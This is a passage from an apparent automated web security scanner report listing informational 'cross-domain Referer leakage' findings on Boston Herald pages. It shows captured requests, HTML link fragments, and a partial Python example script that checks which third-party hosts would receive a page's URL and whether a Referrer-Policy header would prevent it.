...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/television/general/view.bg?articleid=1312267&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/ed4fba_tyler_01272011.jpg" border="0"
width="207" height="181" caption="Talent show gives Steven Tyler collectibles a big boost" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312555&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/5eb1a6_mitt_01282011.jpg" border="0"
width="207" height="181" caption="We Hear: Mitt Romney, David Letterman, Andrew Weisblum and more..." />
</a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.273. http://www.bostonherald.com/jobfind/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /jobfind/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // jobfind/index.tmpl
...[SNIP]...
<![endif]-->

<link rel="alternate" title="Jobfind - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/jobfind/" type="application/rss+xml">

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
   <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fjobfind%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/my_searches.html?partner=bostonherald">My Searches</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/saved_job_manager.html?partner=bostonherald">My Jobs</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://hotjobs.yahoo.com/jobseeker/myhj/resume-manager.html?partner=bostonherald">My Resumes</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://jobfind.salary.com/">What are you worth?</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div class="hjConsoleHeader">
       <a target="hotjobs" href="http://hotjobs.yahoo.com" ylc="http://hotjobs.yahoo.com/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/gr2/monst_lo_nwsp_console_3.gif" alt="Search for jobs with Monster+HotJobs" style="border-width:0px;"/>
       </a>
...[SNIP]...
ize:11px;color:#000000;background:transparent url(http://l.yimg.com/a/i/us/hj/gr/yellow-buttons.gif) no-repeat scroll 0px 0px;height:22px;width:75px;cursor:pointer;float:right;margin-right:10px;">
               <a target="hotjobs" href="http://hotjobs.yahoo.com/jobs-search-advanced/" ylc="http://hotjobs.yahoo.com/jobs-search-advanced/;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald" style="font-size:85%;color:#004CCA;text-decoration:underline;">Advanced Search</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobseeker/login/login.html?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald" ylc="http://hotjobs.yahoo.com/jobseeker/login/login.html;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?.done=http%3A%2F%2Fhotjobs.yahoo.com%2Fjobseeker%2Fjobsearch%2Fmy_searches.html%3Fpartner%3Dbostonherald&partner=bostonherald">Sign In</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="https://us.lrd.yahoo.com/_ylc=X3oDMTFxZmRpYTFrBF9TAzM5NjUxMTI1MQRsaWQDcmVnaXN0ZXIEcGFydG5lcgNib3N0b25oZXJhbGQEc3JjA2NvbnNvbGU-/SIG=15hpku0jd/**https%3A//login.yahoo.com/config/eval_register%3F.last=http%253A%252F%252Fhotjobs.yahoo.com%252Fjobseeker%252Flogin%252Flogin.html%253Fpartner%253Dbostonherald%26.src=hotjobs">Register</a>
...[SNIP]...
</h1>
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/resume" ylc="http://hotjobs.yahoo.com/resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Resumes</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/interview" ylc="http://hotjobs.yahoo.com/interview;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Interviewing</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/salary" ylc="http://hotjobs.yahoo.com/salary;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Salary</a><br />
       <a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/networking" ylc="http://hotjobs.yahoo.com/networking;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Networking</a>&nbsp;|&nbsp;<a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/diversity" ylc="http://hotjobs.yahoo.com/diversity;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Diversity</a>
...[SNIP]...
<div class="hjConsoleContent hjConsoleContentRight">
       <a target="hotjobs" href="http://hotjobs.yahoo.com/create-resume" ylc="http://hotjobs.yahoo.com/create-resume;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">
           <img src="http://l.yimg.com/a/i/us/hj/post_resume.gif" alt="Post Your Resume Now" style="border-width:0px;margin-left:10px;"/>
       </a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Accounting_Finance-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Accounting & Finance</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Clerical_Administrative-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Clerical & Admin</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Healthcare-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Healthcare</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Retail-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Retail</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Sales-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Sales</a></li>
           <li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA" ylc="http://hotjobs.yahoo.com/jobs-c-Technology-l-Boston-MA;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">Technology</a>
...[SNIP]...
<li><a target="hotjobs" style="color:#004CCA;text-decoration:underline;" href="http://hotjobs.yahoo.com/jobs-search-category" ylc="http://hotjobs.yahoo.com/jobs-search-category;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald">More Job Categories...</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald&dest_page=CSB" style="color: rgb(0, 76, 202);">Search Resumes</a>
...[SNIP]...
</span> <a href="http://hiring.hotjobs.yahoo.com/ss/php/hjss_partners.php?showhiring=true&P=bostonherald" style="color: rgb(0, 76, 202);">Save with Starter Packs</a>
...[SNIP]...
<div style="padding-top: 5px;">HotJobs Customer? <a target="hotjobs" href="http://selfcare.hotjobs.yahoo.com/ss/php/hjss_partners.php?P=bostonherald" style="color: rgb(0, 76, 202); text-decoration: underline;">Sign In</a>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://us.bc.yahoo.com/b?P=CO_vyULEenJcz9lH2_GkPAdIzIkMMk1DgrsADsRj&T=17ul1btni%2fX%3d1296270011%2fE%3d396511251%2fR%3dhojo%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY%3dYAHOO%2fF%3d2975542127%2fH%3dc2VydmVJZD0iQ09fdnlVTEVlbkpjejlsSDJfR2tQQWRJeklrTU1rMURncnNBRHNSaiIgc2l0ZUlkPSI0NDYxMDUxIiB0U3RtcD0iMTI5NjI3MDAxMTk3NDMwNyIg%2fQ%3d-1%2fS%3d1%2fJ%3d1F7AC442"></noscript>
...[SNIP]...
<div style="position: relative; top: -70px; left: 275px; text-align: center; background-color: white; width: 150px; border: 1px solid #666;"><a href="http://bostonherald.boocoo.com"><img src="http://cache.heraldinteractive.com/advertising/boocoo/boocoo.jpg" border="0" /></a></div>


            <a href="http://hotjobs.yahoo.com/jobseeker/jobsearch/search_results.html?partner=bostonherald&company_gid=597605&updated_since=anytime"><img src="http://cache.heraldinteractive.com/images/siteImages/viewHeraldJobsOnly.gif"></a>
...[SNIP]...
<div class="jobfindDivTop"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindNewsCorner.gif" alt="Jobfind News Corner" /></div>
...[SNIP]...
</a>
        <a href="http://feeds.feedburner.com/bostonherald/jobfind/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xml3.gif" alt="XML" /></a>
...[SNIP]...
</div>
                           <img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/f8b94c_taco012811.jpg" alt="Photo" />
                       <span class="ArticleSummary">
...[SNIP]...
</div>
<img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindFeaturedEmployer.gif" alt="Jobfind Featured Employers" />
</div>
...[SNIP]...
<br />
+&nbsp;<a class="LinksDarkRedNone" href="http://bh.heraldinteractive.com/jobfind/resume_edge/">Build the perfect resume now!</a>
...[SNIP]...
<div class="jobfindDivTop">
<a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/teaseBoxes/jobfindWhatAreYouWorth.gif" alt="Jobfind Job Salary Wizard" /></a>
...[SNIP]...
<form name="newsearchform" method="get" action="http://jobfind.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp" onsubmit="return gotoTitleSelect();"><script language="javascript" src="http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js"></script>
...[SNIP]...
<li><a href="http://jobfind.salary.com"><img src="http://bh.heraldinteractive.com/images/siteImages/jobfind/salaryWizardLogo.gif" alt="Jobfind Job Salary Wizard"></a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivLeft">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/CostOfLivingWizard/layoutscripts/coll_start.asp">Cost of Living Wizard</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/jobassessor/layoutscripts/joel_start.asp">Job Assessor</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/collegetuitionplanner/layoutscripts/cltl_start.asp">College Tuition Planner</a>
...[SNIP]...
<div id="jobfindSalaryDoubleDivRight">
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/millionairemaker/layoutscripts/mlcl_start.asp">How long until you make a million?</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/salarytimer/layoutscripts/stml_start.asp">Compare yourself to the power players</a><br />
<img src="http://bh.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif" alt="Jobfind" />&nbsp;<a href="http://jobfind.salary.com/execcomp/layoutscripts/excl_companysearch.asp">Executive Compensation Wizard</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.274. http://www.bostonherald.com/mediacenter/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/index.php

Issue detail

The page was loaded from a URL containing a query string (the request below: /mediacenter/index.php?media_type_photo=0&media_type_video=1&media_type_audio=0). The response contains links to other domains; the response fragments that follow show the off-site script, image and anchor targets. When the browser fetches those resources or the user follows those links, the full originating URL, query string included, is sent to the third-party host in the Referer header. Here the query string carries only media-type display toggles, which is why the severity is Information; the same pattern on a page whose query string holds a session token, account identifier or search term would disclose it to every listed domain. The response headers below set no Referrer-Policy that would strip the query string from cross-origin requests.
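As an added example, not part of the crawler's output or the site's own code, the following Python script reproduces the check behind this finding: it parses an HTML body, resolves every fetchable or navigable URL against the request URL, reports the hosts that differ from the page's own, and flags the finding when the request URL also carried a query string. It also tests whether a Referrer-Policy header on the response would keep the query string from reaching those hosts. The sample HTML and header set are constructed from fragments of the response shown on this page; the function names are the example's own.

```python
"""Cross-domain Referer leakage check.

Added example, not the crawler's code: given the URL a page was requested
from and the HTML it returned, list the third-party hosts that would receive
that URL (query string included) in the Referer header, and say whether a
Referrer-Policy header on the response would stop that.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tag/attribute pairs the browser fetches automatically or navigates to.
URL_ATTRS = {
    "a": ("href",),
    "link": ("href",),
    "img": ("src",),
    "script": ("src",),
    "iframe": ("src",),
    "form": ("action",),
}

# Referrer-Policy values a browser recognises, and the subset that never
# sends the path or query string to another origin.
VALID_POLICIES = {
    "no-referrer", "no-referrer-when-downgrade", "origin",
    "origin-when-cross-origin", "same-origin", "strict-origin",
    "strict-origin-when-cross-origin", "unsafe-url",
}
QUERY_STRIPPING_POLICIES = VALID_POLICIES - {"no-referrer-when-downgrade", "unsafe-url"}


class _LinkCollector(HTMLParser):
    """Collect raw URL attribute values from the tags in URL_ATTRS."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        wanted = URL_ATTRS.get(tag, ())
        for name, value in attrs:
            if name in wanted and value:
                self.links.append(value)


def cross_domain_targets(page_url, html):
    """Hosts other than the page's own that the HTML points the browser at."""
    own_host = urlsplit(page_url).netloc.lower()
    collector = _LinkCollector()
    collector.feed(html)
    hosts = set()
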